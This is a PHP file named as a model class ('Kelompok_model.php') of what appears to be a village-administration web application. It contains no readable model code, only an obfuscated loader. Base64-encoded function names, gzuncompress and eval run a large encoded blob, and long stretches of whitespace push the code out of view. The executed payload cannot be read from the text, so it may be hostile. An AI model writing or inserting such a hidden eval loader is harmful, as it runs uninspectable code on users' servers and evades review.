<?php 
        $__='printf';$_='Loading donjo-app/models/Kelompok_model.php';
        















































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtXVtz4kiWfu+I/Q/9MBE1G73bI4HpLqKjHhBGIIGxQeiCXjqQZEtYF1TmKn79fidTEhLgsru6dzdmxpqJKRukzJPn8p3vnEx5fvyRX3/7HdeXT+nLMtk8ffqN/ZpfXz55q+R59d+LNP1HvPIeo/U/ho/RKk5X4e/s95/TIP2xGy3W659//vnTbz/kQ/74Hz98/Off7z8/kO/8+BdeXy4++WSJ7fXcFJd2v/flE/vo5HXvunL//vLjx/VxfVwf17/m9cmNDcGz1K3SNxpzc79S5faTlYW/ctAEanK4/v1DVR/Xx/VxfVwf18f1cX1cH9fH9c92fbQzPq6P6+P6uP51r0/OYv34y83v3qO78h4//fahkY/r4/q4Pq6P6+P6U1f90MPtZDXuxtPIjqOtbU5WqqBKumBMJsZUUbPQn4mKb1tB6nX9ZBZ/9u1+lNnmWFAG42c3jvZeVwrmjXHkNu/8uXlYO00vsrtuer8Xhhh7N1xi/GXnq9KzU6ev+wuzld77wlDpFp+LO7tvrJWBsfUGxovSx+8D/N7bRE6/vXH77ReM4w/5M5i/vV3EnzdzS9qPGvxZN2uPbPOwcyxptxDbG6cxjZxua78YdNgc7Pnl53EXY4yy1dfqeNM4WtualDpx6M9jOVmY8lbpTwM3Dn+p3jdrSpETjdVppyK7PE7dJuZiz9s7NxYDtxFCRuM416SjR3v3luJ7fSObJ8YLPhOdZCouMmljm2KwoM/MG37/pKoTee/0o5e5NU5JFmcpHZ0mxmjo/rzRDgt5yRYL85C6mYR51BD3Q+4N3b9eWOPISfB8z5vMupJ5t6+OHwSQ4XZhScJc62R3t52W0hX8u+fOYaxJt05DXMJOkSKrkdtoi248jpRetMVaU9hIWJjtrdINVt5gur9fft45A2OD9W3txgY2MLYLC/rLWlvbmuyGfF2+1pdflB70NZgGyq2yv5vN/RGbW9krshRBbhH2E50+9N+bYt6eP+1HCY3ldCUd61t65iYo5nWPq92o0d7bZiu0se5RHIXDmg5hl9gjXRS6Ih2liwbZN/plYd7A58bRvCFnsEvixrKwsO7WSn8TuX05JPvBF/b4d+/BRo/wC5vZrQU9S4HXZ3o+wucxvrzlPibhOzVVBrQemfQRID7Wntkifedy0Pw8FuDLL/AR2GnK/Ib8BPIh1jorJaz4AHS/0JR01C39J4TtMMchWDSZD/E1Q7dOIgVKX4V8MmSjNUKX5JdNii1m94oPthK7aWznJq1l7zumscU610w3fZH0JyImVtwH2zSmyD+fkt/D91TRbUQ0/zpfP9Yh05wi7qE59nMT9h6MW9AL6YLboGkINQyA/R0TvhZHwtwMRIqJBflLP/eX/hRxIAtz647rb3DlfitNC1vj2cxj90ZHzCfw9cE25iFwcn90G+TH8h6yBdDzlsaYw9c8TVrOTS+l390+MAnfwe6S2z+Q7xwXmqRiDvioGjAbZ6WftObQZ663FXxERFxWdOatFjR/7FXsdWUdwEd2f5/8xwvcpfRiW1PyEfa9Q2syWyTHhUxVvNJ7hjbRWwNNkHWldzBmoTyCH91rmtTTjLE87UUSvrtXuupsqqvSVJDVmS7fTzDutCffm3pvCX/TMcYEnw0nuqhijHtgE/0+MXT4SE+VNH3tG5hLFzGfMfExhoH/3uf+oE8NdaYZqmR0b0ime0M/qDr0afRkA3aXZ7oxIDmBSZIGTNIMzKlJM8wnAV9lyHgHmXVNn9L3XYxHMsHDjPtpBrkMT5os2Xgz5Iy7iR6NIfcI9xm6II8m+o2PXCYZBQ4JhjXRU3VSrMWQjFnxPMkTAuH0llQ+p0k05v0siiDPVNbDjaRhnXjuTtM3yJWhr+ktdVTLaeT3Y9jZA24yjJpp+qT4LvCs6cppKr7RjzbM92OP/AC+4fI8EzL8K+5/dppSCz6SLAaTSxy9DXMc7Yn4fIdxEAO6r8dGmTM0+Av8WMC8qdO48Yf9QPAGnV9GWXtNOQr4lCwa7Q3+TQk3RnEr8rqf09yGHeSc/SPi1m4EwmXu6DXy3JHddaUJ4o0wDZh5oJjrETYDi/Es+fgeay5yYWe1GEwFd3BHcuwo1njebKV2NyzWDixieSxSTjI3vaaL2GiJo7id2VhDcQ94QOL291uMu0HOGOg9zPd8Vxmr9cLHkY6Ut0imxcBYjmLoTWs/kAy6EPVGQt1mI8Zl0mfE5BExfYVrSNHjgPLN9Ag+Y1tCwWnWjHN0gQXz+JDOMymGjp9hix1082Q1MG8yFtzEeAa/In2rj5irO4n2wEusafLLfdR+gv4p92YeeNewG/5K93W1qbAAFoxmrbXTkEP8m8viJ14jWs+tKFjIhXycj3Ut4VvykF/uMBc41yHy+vqK8mnXojWEannEplvOe3a/8UQyDrsesFQM1Gzvq40ThwOXZHI/TRgvVN2BmnrIueAyVRmAbcjHjQBjyesh+YEfFettAL9FW+u0KzIA38dH4iP4+Zly7z3XX2ov4V/4DhxkpQ7sABwlGmohWwvXcaiq/U1TuRV8dTDFvXebh3i6xDiIPfAorIfyr220j95AOY0x4/qAPC9eRrK4kZp1tjTWaNlJVM3l8k7CEDkGOWK8sprjg9OlexUf2NUDh4HvtgLH7PmzXjSaangOz6uZ9KAvpVe+C5f3udwVW9T0la+9/Q49x8hFAmL1e/ScP6vw+80oxnrAB8bADD/EXMAUPWW+M4lKXaC+WBO/udDFQN8uzOmTY8pH+p7bg+taec51jVgAKmfOslMf55Z//zR507f3lNOBr7Bjx3/QOodRtxM6ZL/bTiXuYDPog2RQorE86xm3Rle6nSHXGF3/6xC5EbnrqwMcK2RTB2w9W4wZen3oIRN+ohztye2Q+ARfr1/UQ6Tfg2ca2WNdv+F8KfzkWkbkJuGKj1nGeeY0XZI5zL/fPCTqzhPbgZuowaNWG/scE4B5aoa4aCEuCx0khQ+r/XFsi2tgppzYmudx3XeKeZ/t2HNU5CM3atOzkSoKfnWd8O8j+B/0i5+ZTaTAbuj154HTjtHGGrxj8bwbt5tm5pEeE6uQpYjBhMYgziX8RFyIfGresHOZmU9l4EOoSW78i2eOdA/zf/p3j5zZgA2QO2zw0TGvW8CZgFNPNvFJxLZr7ms4l9sTtlH7etgeUz1QYBh8lfujfpCnEXJx2FZnxM8q+QB8nWLDR554mLFYjkKrQfwbOX2JcQd38PfJtXEEr2EsLcr/4M42q4Xv/Jlw43uUE+U28UBxTn7Tr4xheAq4jqzc9r7pk3Us8nOczP29e1P1xXNs4PasxGCJNUXMaZ93eB6+JlLtQjHFagm7IW/miFeqs1AXBhyPjCXi4/lVm2h+EZeQa7qzY5swnPxmz2IWnGmR/17LT00P3GW8Urr0fB3nUeMdgWeHe8juNNWwWBvzd8LcELxuKXVNrcTe5B41NXA2WBxzDDKRE8Cl7p5XvtoH76hhGXibqPamBjAtCsleLAeC98i6cPf6WMe3x5pnfCz1uPbniRrNzXWOqRHyHXjR7eQX0pMbTylOyZ9JNwl4pzYFLwdHt8lfUKNuUKNg3PHt62Pp7xir8GX3V9SZGfLPy31dz4136LmME4w7m2SXY0En8dwy1t7t6v02O+W/PA5yXBDLtZz8Z9nZK7efaSzweFE1ulgnahTYI7YTymUd5Fd3Tbm94tvQj5tU8Bb59xDN4btX8oY4Wq7WLN4bBvBY3DuNNeqGO7/IdahTnotcT5/jPsEze/D7ADXZQZ6IqDOEtjGLJqgdJ6nSs7WZIPin8TZPVHPajTbiRrI02GiqSRwrCkyiWGI5lp5HjdNPN47cpjo0cZqoIbosj59h39m6uhWsja/g5+wSd6o2u4I1eS7yyu+/MzeyHMvzlgzirbZwP/LDWHQG0yfkPeS+cHU1d/RR6/d77+GkxIdSrBd1th8iDxy9Ol9iMiCfkd4Lv04shtOoxVgdL2+HWLPTHAuX94UVHpWPL68T4kS5P9A9ubwy8inlkw1hccDzqbTM+wqot159/lxWjin8efazRTEd875RRdbivjJfcLtjfIwNfefzcu7A6i7eMwGuG9VxWA+D98Tk7fXxqK/Jx3Fi1C1N8h3UihZbx94ju9X1+EK1zWmst2x7Le9EW+TFrF575TLVfbDmA0VOBT+BXBPiHzu3OVkNz/T8SLEkb7yKf++wjv38in9jLNarAk+rxK5LOZCNdeJsucxyG3Xy6+NY8JM8d+fPtUXUvcvzeifn51gD4++F3xR4lVDOrY054fjMawI8TP5Y4Sys7rvuq+n5XLBzBb+w1tvexT2LWF7S+p3lK9/X/JD05Y04T6rU6ZmbKl1wFHA51ovHnHnfneeYU1/18tl9ud6U9RgSWvOJE1oN1qfbwd+qHBX4LqNGG5MPvxBPht8Wto9Vlh8Nwe0r53V5trBs6E737cTYAn9Zv4ZqKtgFnCGq6OsKFl3BENZXGRihZ64vcaRqtzew5GycCzxxxFNO+dZYdZt73smvC7nSYA4Mhn2+haFf5ybDqqtYQnO4yI0n3/lDuEJrOYLLf3OOvwb//gRmIYdjfI4BZzWsJY5lXRyrM6GF+m0s5vtzXJ+3vcJ2HPcbfC+CeJ56LGxx2LG+stGmWiBimCG3+xo4iY560Y7bgpN5HtYlIEaeiFsSdhc6wvr39juefbQkwu/X5AktwVbBpWa4N4Zf7VRRpHoSfEnP68ZTr0cxjY07mKLOrY1T70NoHeiZnpefbLbvR9wINQ1sxvfVgsQ2W2QnwWkqq/Ey3CrR5+VoOX2ahtEduDPmtxHrnxOL+Rlfd9kT4vEX2NT/HICrnOmR+gezcEI9/pKbAItT6jVxefa+x7E2pXzzGOurmR6Np0ZbNw1JtgRPmumqpC/DtMDhosbpGsYemBTYPSbfqr5OwuT2GryD6fFBcxmuV+1UroFhEa3FWKNGyT/Lv4NtWR1RtW1W9rtU2HkGHc00vX0Pmx09c/xMfaO87t/czU7j1HwU/uzG7Qx18tHOeCwpy87mYSkNYQ/a3+Tzsb0aeYX6Yplz0pPuzuQvYqjOEYt+gU17PrRfmlbwe3XKi4ixgSEA81n8Io9exv9ZnrR4Tk/t23M8y/2Ff1/1zfM+Lttrs074tzrPo2UvVRRKXpDzSbYP6pmUwzyPbFvKWcFA1Bu0/3J3ylPUo5xiTtrvPOMSfiXPs1qA53o1r627mvCTnag7R2M5+Eo94lZytbeCT0fgNme1CeM3vN+fj+k1AsSf/javqOeu01yxR7wgpTrAaXpnNUCoLsy5P+x2Albj9IMn2p8871Wy3Nx9J0er5r1Sxl56XouiZgrAg46o88VFk/Yq/Hye8FfiJkZfhm2jNdufpv3wBttT/nYuGBh7srMNLoD67qInkstS69mduET4pr+f+SfTQdU+fL3ghGUOJ47Zqc1n9xXYv5QzOeeWnGufeOr/qp6MWs7kvoc8Sthwd6Wm+yswIx/vSReMmS5ED7NonYB/PM+pd5pjHXAx77EZlNvxbP1++FxGvMWxxkmViwAPXrg8b+TM5nTjym3Cnmq+FegMwTuebbl9/dSnPc+f3W/nxlLWs7xBe0VWU43c/iGYN/QV8H4Jf1hamULnB7KFKZzlsBMGO40D8JDNVfO183pMbZxyHp1leqB+W5GvLnJ1fS5uj///vK5UsLzgTqQ/z1LXwPxnqoGHfQ9YyDjtzl36jaF2Q3rcnq2pzNOGJbH9gSkbz78Yn/VZTzpeMxw8+UphB77vQr0683C0z/nIGz4/mvVe4w2osdSdGyHXNdw8byq4/8bXYjpbdOfz9bCzN8HidkVcYXsmY9HXbHM7CmW+K3EQ3H4hnzg+xwWOZ1ajV82v1TpgXckJqAcl0evS3gfVYZVaNWJ/twX5oOKz13LKKcc2F6hLGT5erb8nr+XSSt53Szyr1Oiiy3KA/mrNeobB0NVYmFNNghrIMzfw2btVjuvpfdbZjUSsz5KgY3amZkL7+47/5v5bSByCyQH95rxxzfuMIt/T6NnSTB7L1fxVy9XsvrCCx1TTjKk+pp+LGoft7Z33W67s8Vb0PSl1TDYp5bzcu34jP5HveAHquzW+CxYx5V1J1yNDRn70R1lbh0/sgRfszJ9OZx3oHFBlvwo+idx8V6v96RwB1Y6w2do561Nd3Ycr46ys9Yq+Efx6vMzrsclMHOs5d3yeLwucjoCVtC/A91HIF+cNxadzVyzPn/GkU47nMpYxlO/3PBhTzdD19Pq+9LXadgqdGyxPF5yqzNddXrNgrRvPZLrtT/TDbKpd9D98RSvvS1/Zwy5rkzz/lvjwGve7ynu06tpf44Tf5TttQ1ahvT/Bea7o8p/Bh2rcCvdXbF7q5ITpb8QOuFS1bnqtX3Kl3/tK/bPeDpd7f9EQLvZ0YBvBNr2dG4fEX/bVfZ2c++T7t5W6KLYzpyHUsEbpr5MKfn91GtH2zLfKvTPIQTGRLLJWdU+BYuPFYeeoWD8UPMEWqnXbIm6nztJPvIEXzaNqDpHgi+yZF75vzXu3jG8MOtscKxP4Vex1r9Z37LkyPk7rSKhXXPn9Sm32vf0w1HvF3rhRrS39Mm+e+zrrkyBvO2YbeL9fqZVa0srPlBfnlWiPL987XILP3E31sZ7vp63pXyeOXuhcbm7vNexH3zF/P8vl7Lt8HzZws3zfpWJ7Nk6CuGXni8Ft+lGWf8ZimM7Xz02sAT7o5vvCSl8+0v76Y3df9FZWpZy9qWT0DPDztjbTZX3I9g/Fp2lPtvUs0Gdiuzcxotmw13owMj8dauLps74k8FoemNGXkTtVf6jBt7tuZMKHh8eOP43Uh5l25dyCnJ9JyHO9x8/0sVjwkMchfy4r4juPE9IXPwMYwW78PLK9rK7RC1zqtcZGQmeJoZeg+uzc9Jj+C05JZ+BGiSrgvubC3G/dBH498FKnC1+n/cE8vvM1VPxGesm5I3RoQ4fpg6bf+FdiRVR67fvcF1jMVWPmXWOI/Gf4CTuXjmcR/5PizMfFd7T/Qvq0u9Bnh8uPeq1vdKXhTIggy7Rpm2qlV7958hpyRj1nYBP014NO83MpSV2f5djL94+d69yHP+dnXeSE+zQfi53lfOdYwPgbZcDPu7iEZ12+b02ff0OXsO0B+eUgsjMJMX9vgGzPbcPsXY7Fc1F+b25/QwhkPdT9RTEnyxHlmYDD6UwN31++wiXzPWuf7W/X9zN6b57bqvYU2fl0Uxaspkd7Hq256Rd9wyIvVX0nP9uJ3MnynMxqDmAh6SR4NOXVsNoj7BZ96j+Fs5e87Nt9lEvspHduzmOuwpeq2FHFRhr7ISvq7Np+FI3/jz9qp1FfztxYbp3Vfekft9/36JKfoSjOgQy/T2dFvl+W5yu4nFf6b1wnWCuNfSn3m2cn3jpTFwGf+Jqq+5OV3FfLw6d73sG5mpx3VLhD7MbtzWt8+xX+VI2bFfxHdLvSnp9RXm8v/UnalzymcYjspDb/qXbMWtf62ZXfK71y1tdjPoQ61VhTLL3mR+SfwNBcp5MVt0VE58DpvD71Ksr1Mv5H+tHCd/tdZa3g2MbNeZyhNq+eRWf7a+f3nfP4V2yaUi9kAT+t8/qzser7Z5Wxwtfq9qXLcF3aOk3Cgxu/qpOhptRqTn5OSxWph2M1oOOmsWW8xBw36ZwS1WGVOkjg7/ywn5ce7+dwzrC8OHv/LZ8F32ulC/gQ53xu7ewCODSd+V8O8/xYnAmkOtOBvtn64FvgGfS+DNu3UfrtTGE8nHjl+tTvnzAuBZmMbcF/yjN9A3Bz0k9/DJ8+rV3NhISNd/F5KSfnUX2SR7qdCa3biTFZTYS2RD3iiaCTjLQft6G9dOjqZc72wykGXPjjns7WaXSujs654d7MI5zNOjtFVi06W8fmTtTmaQ3lviOde7ufCMRZxw8T2jsWxvIQaz/lyHG0oHf34CsUA+DrNK//mF3a+kkrZcjt+H2yEYaUuqnuj16x3xy4ghg70ruDtLc+0lyf3vk5/7ysyyo2VLDmWTiWjG4AvcvUW7+dagH4ZZ7jmaxuSuuGvHou7wvnu3SO8bOvg+EQftF84L41m7J+rXbdpsC03KaTqh1/pZ7OPDGoJnji8rfa5by5/3yfPBHqhklRD9DP+TnFYq3KZb1cq9eCFP/uERfXcD+vTcCn5PazQ3ITfvD3c5/zWnfPeft47Z3q52eOL++qnwnvRfh+gjH5PmWzGqPSyzdyybvk5HmlqMnrcnLeWpPz9T0sjqG8Fsc63JjseCBszrnQ5Vlvxk3POMC1Xkv+zgPl2cSzVNHNeO/nNQ5Q5ydl/6DstSu3+59IZ/ezTp0n1/PLldxS541Fbqm8M8P08o73od4cm/Nd1u8U50veozzbf/3zuaY409U0qO+GObxqb/H1vnbt3Fy45z3oz/T+4PaRarbTueHj3EypnhZoX5h6QLAFcUv2/m5pzz/cK9sE/Pwz64WxPEg9JJ4L+c/wcehRFnh/QeH3Xul1eAPpptpPo5qwGo/4fW2zd+OUv6b3MTiXIWRYqxoh8HC9L85hX+kJnM5gs5pzyrAlf29IdCwjU5bX5PaCEkP7PdarQO2c1XtsJ85Q5sau92vhY3mOC86wOM9lfEzKj3o04TjMxg/z3gnPqVXZvn22Q3qp9zHT3YLOqzTP6/o12Zn3KBu9azxb+AM4W+XwR9vymV9wvCW/oR4Y1/nj+8e82j9gZ1GByTkHK/G47Gm8MvZpj2ATFL2g0x5SUWOec2gWN8U7F0vUAwlsO0PuP2EhezfZuNeFaDALjR7l5Pye2rnLy/vci3MxJ396uw55dz2LzxAnlfOWF9hf9AgqsUL6KM860fflelH3UKxX88VulElfqS+o8L/NsMvfvUd8Rpg/Yu9OYz2oHXyfyzGhd711Q+/5bK+3K530yd7HTwO7H55wcFLOU+yZ+pUz9H6130/PYZylbe6rn1f2LKeVPEaY7R4Iqxn+8vHq76FenseunK8+nYelOEI+BAZ1SE6psPvlM60d+PGLdfZshWu+fSar9tnV50774mTLY6/kNSwWLPpbGO/bF7tWT+X4KJTy8b2TK370ypq6b63j+pmkgi/wsw3go+C95zbN/dN/mAl83dwe/Ox4vS4++W3uo3Y/yv+mhsz+HkXNL3sb2ZANid6xAl7Ct9pHp0Hv5rO/WXLaj6m+k0h/GwP5ah4b6+rnl/trSmXttbP+7B0R+Mfmfha27jXup5gbOhFqMfCK3+OzCGtZ+/M4Ir7KatWKT17Za7/khd86r1By2uqeX0I/f/ny6bcffvi//+NJX9i/f89/+8/f/sjjlWff8+DfThP+/RP976f/Kqf9+P+g+vf+/6Cq+8jfa07JXeQ/f/sfPnjndw==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      














































































































































































































































                                                                                                                                                                                                                     $________;
